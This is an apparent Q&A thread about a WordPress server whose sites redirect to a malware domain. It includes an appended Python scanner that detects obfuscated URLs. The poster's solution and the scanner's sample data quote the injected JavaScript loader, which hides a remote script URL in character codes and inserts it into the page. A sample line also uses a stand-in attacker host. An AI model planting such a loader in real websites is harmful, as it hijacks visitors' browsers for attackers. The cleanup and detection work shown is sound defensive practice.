
I'm living my worst nightmare. I have a CentOS server that is hosting tens of WordPress websites.

My clients noticed that their websites open and, after loading, are redirected to (fast.destinyfernandi.com) <---- malware website.

I used ClamAV to detect the malware and cleaned it manually, without any success.

Here is an example of the clamscan result for one of the websites:

----------- SCAN SUMMARY -----------
Known viruses: 6938202
Engine version: 0.101.5
Scanned directories: 2300
Scanned files: 91116
Infected files: 0
Data scanned: 4588.75 MB
Data read: 24121.63 MB (ratio 0.19:1)
Time: 1705.569 sec (28 m 25 s)

But this site is still redirecting to that malware website.

Has anyone come across such an issue?

Please help.

==================================Solved:=============================

The code was injected into all JS files:

var hglgfdrr4634hezfdg = 1;              // marker variable, identical in every infected file
var d = document;
var s = d.createElement('script');
s.type = 'text/javascript';
s.async = true;
// loader URL hidden as char codes; decodes to https://tom.verybeatifulantony.com/a.js
var pl = String.fromCharCode(104,116,116,112,115,58,47,47,116,111,109,46,118,101,114,121,98,101,97,116,105,102,117,108,97,110,116,111,110,121,46,99,111,109,47,97,46,106,115);
s.src = pl;
if (document.currentScript) {
    // insert the loader right before the script that is currently executing
    document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
    d.getElementsByTagName('head')[0].appendChild(s);
}
    Found the malware code after a long night: `var hglgfdrr4634hezfdg = 1; var d=document;var s=d.createElement('script'); s.type='text/javascript'; s.async=true; var pl = String.fromCharCode(104,116,116,112,115,58,47,47,116,111,109,46,118,101,114,121,98,101,97,116,105,102,117,108,97,110,116,111,110,121,46,99,111,109,47,97,46,106,115); s.src=pl; if (document.currentScript) { document.currentScript.parentNode.insertBefore(s, document.currentScript); } else { d.getElementsByTagName('head')[0].appendChild(s); }` – Rami Alnairab Feb 26 '20 at 15:15
  • Did you find a permanent fix? We are also facing the same malware, but a week after cleaning it attacks again; none of the solutions worked. – Suneth Kalhara Jul 04 '20 at 13:29

1 Answer


There are several ways your web resource could be redirected to destinyfernandi:

  1. the database could be patched so that your own legitimate code does the redirect
  2. some injected code in PHP, JS or HTML templates does the redirect, either via window.location, a meta refresh, or the response headers.

First discover what address you get redirected to, whether it is destinyfernandi or some other URL. I mean you could be redirected to some "invisible" URL1, and the server servicing URL1 would then redirect the browser further to destinyfernandi.

Once you discover the first hop (URL) in the redirect chain you can search for that bad URL in the source code and in a database dump.

There is also a chance that the first hop URL (most likely destinyfernandi) is obfuscated in your code, but let's hope that is not the case.

You can also add a breakpoint which fires on redirects, which could help you identify the obfuscated piece of JS code:

window.addEventListener("beforeunload", function() { debugger; }, false)
Maxim Sagaydachny
  • Thanks for the break point code you provided :) – Rami Alnairab Feb 26 '20 at 15:16
  • @RamiAlnairab Did you find a permanent fix? We are also facing the same malware, but a week after cleaning it attacks again; none of the solutions worked – Suneth Kalhara Jul 04 '20 at 13:28
  • The same thing is happening to us. We are updating the OS and WordPress and removing the malware code manually. You can also try installing WP Firewall. It can help show you the attacks, but doesn't catch the script. I will keep this post updated with the latest attacks. – Rami Alnairab Jul 05 '20 at 15:01
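The answer's advice is to find the first hop of the redirect chain and then grep the source tree and a database dump for it, with the caveat that the URL may be obfuscated; the "Solved" block above shows exactly that case, where the loader URL is hidden as a String.fromCharCode(...) list so a plain grep for the domain finds nothing. The script below is an added example (not code from the original post or the answerer) that generalises the decoding step: it walks a directory, decodes every String.fromCharCode(...) call it finds in JS, PHP, HTML and SQL dump files, and reports those that decode to a URL, with file and line number. The sample files in `demo()` are constructed here for illustration; the first one carries the injected loader from the post, the SQL line uses a hypothetical `//evil.example/a.js` host.

```python
"""Find String.fromCharCode()-obfuscated URLs in a WordPress tree or DB dump.

Added example, not the original poster's or answerer's code. Usage:
    python find_charcode_urls.py /var/www/html        # scan a real tree
    python find_charcode_urls.py                      # run the built-in demo
"""
import os
import re
import shutil
import sys
import tempfile
from typing import Dict, List, Tuple

# String.fromCharCode(104, 116, ...) with any whitespace around the numbers.
FROMCHARCODE_RE = re.compile(
    r"String\.fromCharCode\s*\(\s*((?:\d+\s*,\s*)*\d+)\s*\)")
# Absolute or protocol-relative URL: https://host..., http://host..., //host...
URL_RE = re.compile(r"^(?:https?:)?//[\w.-]+", re.IGNORECASE)

SCAN_EXTS = (".js", ".php", ".html", ".htm", ".sql")


def decode_charcodes(arg_list: str) -> str:
    """Turn '104,116,116,112' into 'http'; out-of-range code points are skipped."""
    chars = []
    for tok in arg_list.split(","):
        code = int(tok.strip())
        if 0 <= code <= 0x10FFFF:
            chars.append(chr(code))
    return "".join(chars)


def find_obfuscated_urls(text: str) -> List[Tuple[int, str]]:
    """Return (line_number, decoded_url) for each fromCharCode call that hides a URL.

    Legitimate fromCharCode uses (BOMs, key codes) decode to non-URL strings and
    are ignored, so the hit list is short enough to act on by hand.
    """
    hits = []
    for m in FROMCHARCODE_RE.finditer(text):
        decoded = decode_charcodes(m.group(1))
        if URL_RE.match(decoded):
            line_no = text.count("\n", 0, m.start()) + 1
            hits.append((line_no, decoded))
    return hits


def scan_tree(root: str, exts=SCAN_EXTS) -> Dict[str, List[Tuple[int, str]]]:
    """Walk root and map relative path -> hits for every file that has any."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    hits = find_obfuscated_urls(fh.read())
            except OSError:
                continue  # unreadable file: skip, do not abort the whole scan
            if hits:
                findings[os.path.relpath(path, root)] = hits
    return findings


# Constructed sample files (not real site content). The first carries the
# injected loader quoted in the post; the SQL line is a hypothetical example of
# the same trick inside a wp_posts row, which a dump of the database would show.
INFECTED_JS = (
    "var hglgfdrr4634hezfdg = 1; var d=document;var s=d.createElement('script');\n"
    "var pl = String.fromCharCode(104,116,116,112,115,58,47,47,116,111,109,46,118,"
    "101,114,121,98,101,97,116,105,102,117,108,97,110,116,111,110,121,46,99,111,"
    "109,47,97,46,106,115); s.src=pl;\n"
    "jQuery(function () { /* legitimate theme code */ });\n"
)
CLEAN_JS = "var label = String.fromCharCode(65, 66, 67); // 'ABC', not a URL\n"
DUMP_SQL = (
    "INSERT INTO wp_options VALUES (1,'siteurl','http://example.test','yes');\n"
    "INSERT INTO wp_posts VALUES (7,'<script>var u=String.fromCharCode(47,47,"
    "101,118,105,108,46,101,120,97,109,112,108,101,47,97,46,106,115);</script>');\n"
)


def demo() -> Dict[str, List[Tuple[int, str]]]:
    """Build a throwaway tree from the constructed samples, scan it, clean up."""
    root = tempfile.mkdtemp(prefix="wp-scan-")
    try:
        os.makedirs(os.path.join(root, "wp-content"))
        for rel, body in (("infected.js", INFECTED_JS), ("clean.js", CLEAN_JS),
                          (os.path.join("wp-content", "dump.sql"), DUMP_SQL)):
            with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_tree(root)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    results = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else demo()
    for rel_path, url_hits in sorted(results.items()):
        for line_no, url in url_hits:
            print(f"{rel_path}:{line_no}: {url}")
```

Every decoded hit is the first hop of the chain for that file; grep the rest of the tree and the dump for the decoded host as well, since later copies of the injection may use a different char-code list for the same URL, and re-scan after cleanup so a file the cleanup missed shows up before the redirect does.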